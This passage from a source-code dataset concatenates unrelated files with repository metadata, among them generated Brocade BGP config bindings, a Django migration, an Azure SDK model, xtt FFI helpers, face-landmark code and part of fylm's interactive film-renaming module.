self._set()
def _unset_update_source(self):
self.__update_source = YANGDynClass(base=update_source.update_source, is_container='container', presence=False, yang_name="update-source", rest_name="update-source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Source of routing updates', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_send_community(self):
"""
Getter method for send_community, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/send_community (container)
"""
return self.__send_community
def _set_send_community(self, v, load=False):
"""
Setter method for send_community, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/send_community (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_send_community is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_send_community() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=send_community.send_community, is_container='container', presence=False, yang_name="send-community", rest_name="send-community", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Send community attribute to this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """send_community must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=send_community.send_community, is_container='container', presence=False, yang_name="send-community", rest_name="send-community", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Send community attribute to this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__send_community = t
if hasattr(self, '_set'):
self._set()
def _unset_send_community(self):
self.__send_community = YANGDynClass(base=send_community.send_community, is_container='container', presence=False, yang_name="send-community", rest_name="send-community", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Send community attribute to this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_activate(self):
"""
Getter method for activate, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/activate (empty)
"""
return self.__activate
def _set_activate(self, v, load=False):
"""
Setter method for activate, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/activate (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_activate is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_activate() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="activate", rest_name="activate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow exchange of route in the current family mode', u'cli-run-template': u'$(.?\\r:no neighbor $(../af-ipv4-neighbor-address) activate\n)', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """activate must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="activate", rest_name="activate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow exchange of route in the current family mode', u'cli-run-template': u'$(.?\\r:no neighbor $(../af-ipv4-neighbor-address) activate\n)', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__activate = t
if hasattr(self, '_set'):
self._set()
def _unset_activate(self):
self.__activate = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="activate", rest_name="activate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow exchange of route in the current family mode', u'cli-run-template': u'$(.?\\r:no neighbor $(../af-ipv4-neighbor-address) activate\n)', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
af_ipv4_neighbor_address = __builtin__.property(_get_af_ipv4_neighbor_address, _set_af_ipv4_neighbor_address)
remote_as = __builtin__.property(_get_remote_as, _set_remote_as)
shutdown = __builtin__.property(_get_shutdown, _set_shutdown)
af_vrf_neighbor_capability = __builtin__.property(_get_af_vrf_neighbor_capability, _set_af_vrf_neighbor_capability)
allowas_in = __builtin__.property(_get_allowas_in, _set_allowas_in)
filter_list = __builtin__.property(_get_filter_list, _set_filter_list)
maximum_prefix = __builtin__.property(_get_maximum_prefix, _set_maximum_prefix)
default_originate = __builtin__.property(_get_default_originate, _set_default_originate)
prefix_list = __builtin__.property(_get_prefix_list, _set_prefix_list)
neighbor_route_map = __builtin__.property(_get_neighbor_route_map, _set_neighbor_route_map)
route_reflector_client = __builtin__.property(_get_route_reflector_client, _set_route_reflector_client)
unsuppress_map = __builtin__.property(_get_unsuppress_map, _set_unsuppress_map)
af_nei_weight = __builtin__.property(_get_af_nei_weight, _set_af_nei_weight)
enable_peer_as_check = __builtin__.property(_get_enable_peer_as_check, _set_enable_peer_as_check)
additional_paths = __builtin__.property(_get_additional_paths, _set_additional_paths)
associate_peer_group = __builtin__.property(_get_associate_peer_group, _set_associate_peer_group)
description = __builtin__.property(_get_description, _set_description)
local_as = __builtin__.property(_get_local_as, _set_local_as)
next_hop_self = __builtin__.property(_get_next_hop_self, _set_next_hop_self)
advertisement_interval = __builtin__.property(_get_advertisement_interval, _set_advertisement_interval)
ebgp_btsh = __builtin__.property(_get_ebgp_btsh, _set_ebgp_btsh)
ebgp_multihop = __builtin__.property(_get_ebgp_multihop, _set_ebgp_multihop)
password = __builtin__.property(_get_password, _set_password)
enforce_first_as = __builtin__.property(_get_enforce_first_as, _set_enforce_first_as)
timers = __builtin__.property(_get_timers, _set_timers)
remove_private_as = __builtin__.property(_get_remove_private_as, _set_remove_private_as)
as_override = __builtin__.property(_get_as_override, _set_as_override)
soft_reconfiguration = __builtin__.property(_get_soft_reconfiguration, _set_soft_reconfiguration)
static_network_edge = __builtin__.property(_get_static_network_edge, _set_static_network_edge)
bfd = __builtin__.property(_get_bfd, _set_bfd)
maxas_limit = __builtin__.property(_get_maxas_limit, _set_maxas_limit)
update_source = __builtin__.property(_get_update_source, _set_update_source)
send_community = __builtin__.property(_get_send_community, _set_send_community)
activate = __builtin__.property(_get_activate, _set_activate)
_pyangbind_elements = {'af_ipv4_neighbor_address': af_ipv4_neighbor_address, 'remote_as': remote_as, 'shutdown': shutdown, 'af_vrf_neighbor_capability': af_vrf_neighbor_capability, 'allowas_in': allowas_in, 'filter_list': filter_list, 'maximum_prefix': maximum_prefix, 'default_originate': default_originate, 'prefix_list': prefix_list, 'neighbor_route_map': neighbor_route_map, 'route_reflector_client': route_reflector_client, 'unsuppress_map': unsuppress_map, 'af_nei_weight': af_nei_weight, 'enable_peer_as_check': enable_peer_as_check, 'additional_paths': additional_paths, 'associate_peer_group': associate_peer_group, 'description': description, 'local_as': local_as, 'next_hop_self': next_hop_self, 'advertisement_interval': advertisement_interval, 'ebgp_btsh': ebgp_btsh, 'ebgp_multihop': ebgp_multihop, 'password': password, 'enforce_first_as': enforce_first_as, 'timers': timers, 'remove_private_as': remove_private_as, 'as_override': as_override, 'soft_reconfiguration': soft_reconfiguration, 'static_network_edge': static_network_edge, 'bfd': bfd, 'maxas_limit': maxas_limit, 'update_source': update_source, 'send_community': send_community, 'activate': activate, }
|
[
"badaniya@brocade.com"
] |
badaniya@brocade.com
|
243dcf4cbd787542b8035f70084f4f0edc16909f
|
57b34673b9b9089a14b516f122085c86f54b5905
|
/crepes_bretonnes/blog/migrations/0001_initial.py
|
aecd577eb3ffc3028faaf9012a20b48dd9238428
|
[] |
no_license
|
AnthonyCamelCase/CrepesDjango
|
83b801fbbf7ab6fdf6a538bd18b66f6c475a6ba2
|
2f8622ed766e6d6a601a330cd0eaea61b75322ea
|
refs/heads/master
| 2022-11-17T17:13:13.064851
| 2020-07-17T15:07:41
| 2020-07-17T15:07:41
| 280,087,669
| 0
| 1
| null | 2020-07-17T15:07:43
| 2020-07-16T07:41:14
|
Python
|
UTF-8
|
Python
| false
| false
| 1,318
|
py
|
# Generated by Django 3.0.8 on 2020-07-16 12:48
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Categorie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nom', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('titre', models.CharField(max_length=100)),
('slug', models.SlugField(max_length=100)),
('auteur', models.CharField(max_length=42)),
('contenu', models.TextField(null=True)),
('date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Date de parution')),
('categorie', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Categorie')),
],
options={
'ordering': ['date'],
},
),
]
|
[
"a.dottesi@hotmail.fr"
] |
a.dottesi@hotmail.fr
|
6e8bab13b0bf9b431be3409f57efa615ab2d6522
|
64017b09b175d6298a0c873507c011fca66d564d
|
/FDApy/src/__init__.py
|
6f6e4d71c4848b73a70c0ceac3af3baf7b90dba7
|
[
"MIT"
] |
permissive
|
mattjtodd/FDApy
|
844d84529088ec3056b05150124a37bc1b420a1f
|
50feb99e34f265b1c17a6f234a9d2f942ceb8f6d
|
refs/heads/master
| 2023-07-11T10:53:40.556226
| 2021-08-20T15:59:16
| 2021-08-20T15:59:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 58
|
py
|
"""
C++ code module.
This module contains C++ codes.
"""
|
[
"steven_golovkine@icloud.com"
] |
steven_golovkine@icloud.com
|
cdd849bf42e0aabdc0b93f35e38e325cdaeeef3b
|
3d94eaf21d3342f6ff7febe45e37436016f551e0
|
/while.py
|
0cc642da98c6cf47734c7cd806017670df6bd283
|
[] |
no_license
|
JihyeCha/college
|
a6402b60b2afd6f8c5a67bd8175b7052abee94d0
|
5c81d897e636c999a8a6fe95d4c4cf7e18b908ae
|
refs/heads/main
| 2023-05-23T00:19:03.453613
| 2021-06-15T07:07:14
| 2021-06-15T07:07:14
| 364,822,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
i = 0
while i in range(3):
print(i)
print("영희 : 안녕 철수야 뭐해?")
print("철수 : 안녕 영희야 숨만 쉬고 있어")
if i == 1:
continue
print("정수 : 안녕 얘들아")
|
[
"noreply@github.com"
] |
JihyeCha.noreply@github.com
|
8c66a4f48a392bc2a7c364f19d1d33c46219c529
|
9a7c7d5b81e362f49366dfba963640867ca6f6db
|
/venv/Scripts/easy_install-script.py
|
86e017dad94e0e1958cba0ffa08cc41144ae6aa8
|
[] |
no_license
|
Dark-C-oder/session8
|
56d204a8c44efba9b24c9c32b4957f04b2acc7c6
|
5bdb06f17656032ca6f6d44dfee0bafe819bf896
|
refs/heads/master
| 2020-06-03T08:40:15.765287
| 2019-06-12T06:38:53
| 2019-06-12T06:38:53
| 191,512,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 448
|
py
|
#!C:\Users\HP\PycharmProjects\session8\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"rsharma240599@gmail.com"
] |
rsharma240599@gmail.com
|
c3a74fe27402ee5264201ea0910384cec6a1bcf2
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/models/hour_details_fragment_py3.py
|
afa962a3c628fb781b542e76a7e5ec1c067cd00b
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497
| 2019-05-22T00:55:16
| 2019-05-22T00:55:16
| 187,986,993
| 1
| 0
|
MIT
| 2020-10-02T01:17:02
| 2019-05-22T07:33:46
|
Python
|
UTF-8
|
Python
| false
| false
| 918
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class HourDetailsFragment(Model):
"""Properties of an hourly schedule.
:param minute: Minutes of the hour the schedule will run.
:type minute: int
"""
_attribute_map = {
'minute': {'key': 'minute', 'type': 'int'},
}
def __init__(self, *, minute: int=None, **kwargs) -> None:
super(HourDetailsFragment, self).__init__(**kwargs)
self.minute = minute
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
208c52c383c9088b8689673876d6a989678f6664
|
13ff15f5a60b7616fe5610d0b4908f5bc524e931
|
/xtt/_ffi_utils.py
|
0f8e62bc35a4526c2e788468fb05f50960dea01c
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
xaptum/xtt-python
|
f79a5632953c7e3a0c07e84c898705670a4f73ff
|
23ee469488d710d730314bec1136c4dd7ac2cd5c
|
refs/heads/master
| 2020-03-16T13:09:48.832397
| 2018-11-13T18:47:59
| 2018-11-13T19:31:47
| 132,682,741
| 0
| 2
|
Apache-2.0
| 2018-11-13T19:31:48
| 2018-05-09T01:05:22
|
Python
|
UTF-8
|
Python
| false
| false
| 3,911
|
py
|
# Copyright 2018 Xaptum, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from __future__ import absolute_import
from __future__ import print_function
import six
import sys
from xtt._ffi import ffi as _ffi
from xtt._ffi import lib as _lib
from xtt._utils import to_bytes, to_text, _check_len
class _DataStructMetaclass(type):
"""
Adds a :sizeof: class member containing the size in bytes of the
native struct.
"""
def __call__(cls, *args, **kwargs):
if not hasattr(cls, 'struct'):
raise ValueError("Child class must define 'struct'")
cls.sizeof = _ffi.sizeof(cls.struct)
return type.__call__(cls, *args, **kwargs)
@six.add_metaclass(_DataStructMetaclass)
class DataStruct(object):
"""
Many XTT structs are wrappers for a single char[] named data. This
base class hodls a native struct and provides access to the
underlying data array.
Child classes must set the `struct` class member to specify
the struct to wrap.
"""
__metaclass__ = _DataStructMetaclass
@classmethod
def from_file(cls, filename):
with open(filename, 'rb') as f:
raw = f.read()
return cls(raw)
def __init__(self, value=None):
self.native = _ffi.new('%s*'%self.struct)
if self.native == _ffi.NULL:
raise MemoryError("Unable to allocate native object")
if value:
self.data = value
def __repr__(self):
return "%s(%s)"%(type(self).__name__, repr(self.data))
def __str__(self):
return str(self.data)
@property
def data(self):
return _ffi.buffer(self.native.data)[:]
@data.setter
def data(self, value):
_check_len(self.native.data, value)
_ffi.memmove(self.native.data, value, len(value))
class Buffer(object):
"""
Owns and allocates an underlying C unsigned char buffer.
"""
def __init__(self, size):
self.size = size
self.native = _ffi.new('unsigned char[]', self.size)
if self.native == _ffi.NULL:
raise MemoryError("Unable to allocate native object")
class BufferView(object):
"""
A view of an existing underlying C unsigned char buffer.
The view is defined by two parameters, an unsigned char
pointer and a size. These may be set directly or pointers
to them may be passed as outputs to C functions.
This class is designed to work with the :io_bytes_requested:
and :io_ptr: parameters of the XTT C functions.
"""
def __init__(self):
self._size = _ffi.new('uint16_t[1]')
self._data = _ffi.new('unsigned char *[1]')
if self._size == _ffi.NULL or self._data == _ffi.NULL:
raise MemoryError("Unable to allocate native object")
@property
def buffer(self):
"""
A Python buffer representing the underlying memory.
The buffer may be passed to IO functions like this:
`view.buffer = socket.recv(len(view.buffer))`
"""
return _ffi.buffer(self._data[0], self._size[0])
@property
def addressof_size(self):
return _ffi.addressof(self._size)[0]
@property
def addressof_data(self):
return _ffi.addressof(self._data)[0]
@property
def size(self):
return self._size[0]
@property
def data(self):
return self._data[0]
|
[
"david.bild@xaptum.com"
] |
david.bild@xaptum.com
|
559697093aa7adb1df388f4314ff5db31f9ec2bf
|
d88292262daa5bf74c4ba445ec6376db16ae754c
|
/DeleteFile.py
|
013994fa9577819fd43aad90d6ac88073f34e33b
|
[] |
no_license
|
ishswar/aws-s3Repo-usingBoto3
|
e46d9abb2c86a6db1f5ae96a93573b465824d9a8
|
7a8046d46ddf4be83b77fa1d17f0f91545a73f72
|
refs/heads/master
| 2020-07-22T10:53:21.470111
| 2019-09-09T21:04:35
| 2019-09-09T21:04:35
| 207,174,495
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 821
|
py
|
#!/usr/bin/env python3
import re
import sys
import s3repo
from s3repo.s3repomain import *
s3repo = s3RepoMain()
logger = logger_setup.logger
logger.name = "s3repo.deleteFile"
logger.setLevel(logging.DEBUG)
def usage():
programName = os.path.basename(sys.argv[0])
logger.info(programName + " <username> <userpassword> file-key")
if len(sys.argv) != 4:
programName = os.path.basename(sys.argv[0])
logger.error("Expected 4 arguments got [" + str(len(sys.argv)) + ") - re-run program with correct arguments")
usage()
sys.exit(-1)
logger.info(
"About to delete file for user with this info \n\r Username: [" + sys.argv[1] + "] \r\n password: [******]" +
"\n\r file-key: [" + sys.argv[3] + "]")
s3repo.deleteFile(bucket_name=sys.argv[1], user_password=sys.argv[2], user_Key=sys.argv[3])
|
[
"pshah@tibco.com"
] |
pshah@tibco.com
|
f48169e17d0936951759a1348bbd610d915be750
|
adb8c88a0d1a076565014f2eaafe35f8a4965c5e
|
/plugin.py
|
b58ea3def05570d7d29252a87d0ae301620fa9f3
|
[] |
no_license
|
viktorkelemen/SpotBunny
|
2eccae05e8d13160827b302535a78bd1b6d02cb0
|
356818a2128020e152da759d4e24d5623b5626ad
|
refs/heads/master
| 2021-01-01T05:36:37.608596
| 2015-05-17T21:13:40
| 2015-05-17T21:35:53
| 35,783,490
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 358
|
py
|
import urllib
def results(fields, original_query):
q = fields.get('~query')
url = u"https://our.intern.facebook.com/intern/bunny/?" + urllib.urlencode([('q', q)])
return {
"title": "Open spotbunny {}".format(q),
"run_args": [url]
}
def run(url):
import os, pipes
os.system('open {0}'.format(pipes.quote(url.encode('utf8'))))
|
[
"kelemen.viktor@gmail.com"
] |
kelemen.viktor@gmail.com
|
5aa242f700ec5a467cdc7d012a2345b5d62d513d
|
82ebee7de7c8aaa4343c1b047e8dec0b59f58093
|
/src/face/landmarks.py
|
b1e712a5923bc01928a4bb025efd49b791c2e3ab
|
[] |
no_license
|
bdach/biometric-recognition
|
2b65bcc1b0d278fc01153ffcdc41d27a85cae160
|
eb7f9ec6a728b90cfbce36cce47176a2506898f1
|
refs/heads/master
| 2020-04-24T15:42:08.490240
| 2019-05-12T11:14:44
| 2019-05-12T11:14:44
| 172,078,857
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,328
|
py
|
import dlib
import numpy as np
class LandmarkNormalizer:
result_length = 136
@staticmethod
def compute_face_descriptor(image, landmarks):
xs = np.array([point.x for point in landmarks.parts()])
ys = np.array([point.y for point in landmarks.parts()])
# point no. 36 is left corner of left eyelid
# point no. 45 is right corner of right eyelid
slope_x = (ys[45] - ys[36]) / (xs[45] - xs[36])
# point no. 27 is top of nose ridge
# point no. 33 is bottom of nose ridge
slope_y = (xs[33] - xs[27]) / (ys[33] - ys[27])
xs_skewed = xs - slope_y * ys
ys_skewed = ys - slope_x * xs
width = xs_skewed.max() - xs_skewed.min()
height = ys_skewed.max() - ys_skewed.min()
xs_scaled = (xs_skewed - xs_skewed.min()) / width - 0.5
# Y axis inverted for human purposes only - shouldn't matter in practice
ys_scaled = -(ys_skewed - ys_skewed.min()) / height + 0.5
return np.concatenate((xs_scaled, ys_scaled))
class DlibFaceRecognitionModel:
result_length = 128
def __init__(self, model_file=''):
self.model = dlib.face_recognition_model_v1(model_file)
def compute_face_descriptor(self, image, landmarks):
return self.model.compute_face_descriptor(image, landmarks)
|
[
"dach.bartlomiej@gmail.com"
] |
dach.bartlomiej@gmail.com
|
546e3bf16cd2f3dc5b2c5e5f6029b4a09fddc2ce
|
6ea5c9b5786eb6bf394b092316f293406eaa8a96
|
/fylm/fylmlib/interactive.py
|
994d5feb5948790e1f545f6954c6209a94cde261
|
[
"Apache-2.0"
] |
permissive
|
codacy-badger/fylm
|
dc75866e632945b6587c2aa62e3d835de64e8874
|
1f49eb14ecc0fa257d47a4e4c6420407ece11f39
|
refs/heads/main
| 2023-03-21T22:52:17.574055
| 2021-03-16T16:13:51
| 2021-03-16T16:13:51
| 348,589,304
| 0
| 0
|
Apache-2.0
| 2021-03-17T05:24:30
| 2021-03-17T05:24:29
| null |
UTF-8
|
Python
| false
| false
| 18,088
|
py
|
# -*- coding: future_fstrings -*-
# Copyright 2018 Brandon Shelley. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interactive input handler for Fylm.
This module handles all user input during interactive mode.
Credit: https://github.com/jreyesr/better-input
ask: the main class exported by this module.
"""
from __future__ import unicode_literals, print_function
from builtins import *
import readline
import os
import fylmlib.config as config
from fylmlib.parser import parser
from fylmlib.console import console
from fylmlib.duplicates import duplicates
import fylmlib.formatter as formatter
import fylmlib.operations as ops
from fylmlib.enums import Should
class interactive:
@classmethod
def lookup(cls, film):
"""Main router for handling a known or unknown film.
Determines whether the user should be prompted to verify a
matching film, or look up an unknown one.
Args:
film: (Film) Current film to process
Returns:
True if the film passes verification, else False
"""
if config.interactive is False:
raise Exception('Interactive mode is not enabled')
if film.should_ignore:
return cls.handle_unknown_film(film)
else:
# Search TMDb for film details (if enabled).
film.search_tmdb()
return cls.verify_film(film)
@classmethod
def handle_duplicates(cls, film):
"""Prompt the user to handle duplicates of a film.
Determines how to handle duplicates of the inbound film, either
replacing, keeping both, or skipping.
Args:
film: (Film) Current film to process
Returns:
False if deleting this or skipping this film, otherwise True
(if True, it will be processed)
"""
if config.interactive is False:
raise Exception('Interactive mode is not enabled')
# Return immediately if the film is not a duplicate
if len(film.duplicate_files) == 0:
return True
console().print_duplicate_lines(film)
choices = []
# Get exact duplicates
exact_duplicates = duplicates.find_exact(film)
# Find all lower quality duplicates that are marked as upgradable (i.e., in the upgrade table)
# TODO: This is probably very circular and could be improved a lot.
upgradable_files = [l for l in duplicates.find_lower_quality(film) if l.duplicate == Should.UPGRADE]
duplicates_to_delete = []
if len(exact_duplicates) > 0:
# If there are any exact duplicates, choose the one at the destination that would be overwritten if possible
exact = next((d for d in exact_duplicates if d.destination_path == film.destination_path), exact_duplicates[0])
duplicates_to_delete.append(exact)
# If the duplicate is smaller than the current primary file, consider it an upgrade, otherwise a replace.
(s, a) = ('Upgrade', '') if exact.size < film.primary_file.size else ('Replace', ' anyway')
choices.append(f"{s} existing film '{exact.new_filename_and_ext}'{a} ({formatter.pretty_size(exact.size)})")
else:
# If there are no upgradable files, but still duplicates detected,
# the only choice should be keep (not upgrade or replace)
if len(upgradable_files) == 0 and len(film.duplicate_files) > 0:
choices.append(f"Keep this file (and existing {formatter.pluralize('film', len(film.duplicate_files))})")
else:
choices.append(f"Upgrade {len(upgradable_files)} existing lower quality {formatter.pluralize('film', len(upgradable_files))}")
duplicates_to_delete = upgradable_files
choices.extend([f"Delete this file (keep existing {formatter.pluralize('film', len(film.duplicate_files))})",
('S', '[ Skip ]')])
choice = cls._choice_input(
prompt='',
choices=choices,
default=None,
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
# Keep (move/copy) this file
if choice == 0:
film.ignore_reason = None # Reset ignore reason just in case this has changed
# If there were duplicates, and this film is upgrading/replacing, remove them
if len(duplicates_to_delete) > 0:
for d in duplicates_to_delete:
# Mark the duplicate for upgrading
d.duplicate = Should.UPGRADE
duplicates.rename_unwanted(film, duplicates_to_delete)
return True
# Delete this file (last choice is always skip, second last is delete)
elif choice == len(choices) - 2:
# Ask user to confirm destructive action
console().print_ask(
f"Are you sure you want to delete '{film.source_path}?'")
confirm_delete = cls._choice_input(
prompt='',
choices=['Yes – delete it', 'No – keep it'],
default=None,
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
if confirm_delete == 0:
cls.delete_and_keep_existing(film)
return False
# Skipping (or default)
else:
return False
@classmethod
def delete_and_keep_existing(cls, film):
"""Keep the current duplicate instead of the current film
Args:
film: (Film) Current film being processed, to be deleted
"""
if film.is_folder:
ops.dirops.delete_dir_and_contents(film.source_path, max_size=-1)
else:
ops.fileops.delete(film.source_path)
@classmethod
def verify_film(cls, film):
"""Prompt the user to verify whether the best match is correct.
Ask the user to verify that the currently detected TMDb match
is correct, and offer choices that let the user search or look
up a different title.
Args:
film: (Film) Current film to process
Returns:
True if the film passes verification, else False
"""
# TODO: When a bad lookup is found (Mars Quest for Life 1080p (2009).mkv), if fixed by a good match, should be green in interactive rename, not red
console().print_search_result(film)
if len(film.matches) > 0:
console().print_ask('Is this correct? [Y]')
choice = cls._choice_input(
prompt='',
choices=[
('Y', 'Yes'),
('N', 'No, search by name'),
('I', 'No, lookup by ID'),
('S', '[ Skip ]')],
default='Y',
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
film.tmdb_verified = (choice == 0)
if choice == 1:
return cls.search_by_name(film)
elif choice == 2:
return cls.lookup_by_id(film)
elif choice == 3:
film.ignore_reason = 'Skipped'
console().print_interactive_skipped()
return False
else:
# User is happy with the result, verify
return film.tmdb_verified
else:
console().print_ask('No matches found')
choice = cls._choice_input(
prompt='',
choices=[
('N', 'Search by name'),
('I', 'Lookup by ID'),
('S', '[ Skip ]')],
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
if choice == 0:
return cls.search_by_name(film)
elif choice == 1:
return cls.lookup_by_id(film)
elif choice == 2:
film.ignore_reason = 'Skipped'
console().print_interactive_skipped()
return False
@classmethod
def handle_unknown_film(cls, film):
"""Ask the user whether an unknown film should be manually
searched for or skipped.
Args:
film: (Film) Current film to process
Returns:
True if the film should be processed, else False
"""
console().print_ask(f"{film.ignore_reason} [N]")
# Continuously loop this if an invalid choice is entered.
while True:
choice = cls._choice_input(
prompt='',
choices=[
('N', 'Search by name'),
('I', 'Lookup by ID'),
('S', '[ Skip ]')],
default='N',
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
if choice == 0:
return cls.search_by_name(film)
elif choice == 1:
return cls.lookup_by_id(film)
elif choice == 2:
film.ignore_reason = 'Skipped'
console().print_interactive_skipped()
return False
@classmethod
def lookup_by_id(cls, film):
"""Perform an interactive lookup of a film by ID.
Ask the user for a TMDb ID, then perform a search for that ID.
Args:
film: (Film) Current film to process
Returns:
True if the film passes verification, else False
"""
while True:
# Delete the existing ID in case it is a mismatch.
film.tmdb_id = None
search = cls._simple_input('TMDb ID: ', mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
try:
# Attempt to convert the search query to an int and update
# the film.
film.tmdb_id = int(search)
try:
# Search for the new film by ID.
film.search_tmdb()
# Verify the search result.
return cls.verify_film(film)
except Exception as e:
console().print_interactive_error("Hrm, that ID doesn't exist")
console.debug(e)
except Exception as e:
console().print_interactive_error("A TMDb ID must be a number")
console.debug(e)
@classmethod
def search_by_name(cls, film):
"""Perform an interactive name search.
Ask the user for a search query, then perform a search for title, and,
if detected, year.
Args:
film: (Film) Current film to process
Returns:
True or False, passing the return value from choose_from_matches
"""
# Delete the existing ID in case it is a mismatch.
film.tmdb_id = None
query = cls._simple_input("Search TMDb: ",
f"{film.title or ''}{' ' if film.title else ''}{film.year or ''}",
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
film.title = parser.get_title(query)
film.year = parser.get_year(query)
film.search_tmdb()
return cls.choose_from_matches(film, query)
@classmethod
def choose_from_matches(cls, film, query):
"""Choose the correct film from a set of matches.
Ask the user for input, then map the selected film to the
current film object.
Args:
film: (Film) Current film to process
Returns:
